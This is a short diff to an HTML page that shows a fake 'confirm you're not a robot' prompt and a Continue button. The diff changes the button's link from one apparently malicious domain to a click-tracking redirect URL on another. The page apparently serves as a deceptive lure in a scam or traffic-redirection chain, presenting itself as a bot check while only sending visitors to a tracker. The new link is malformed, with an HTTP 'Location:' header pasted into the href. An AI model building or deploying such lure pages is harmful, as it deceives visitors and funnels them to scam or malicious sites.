--- a/index.html
+++ b/index.html
@@ -51,7 +51,7 @@
 <body>
   <div class="box">
     <div class="title">Please confirm you're not a robot.<br>Tap continue to proceed.</div>
-    <a href="http://injil.shop/sateman.php" class="btn">Continue</a>
+    <a href="Location: https://siluman.pro/dashboard/track/tracking.php?click_id=GEN_PATRA&r=https://siluman.pro/blank.html" class="btn">Continue</a>
   </div>
 </body>
 </html>
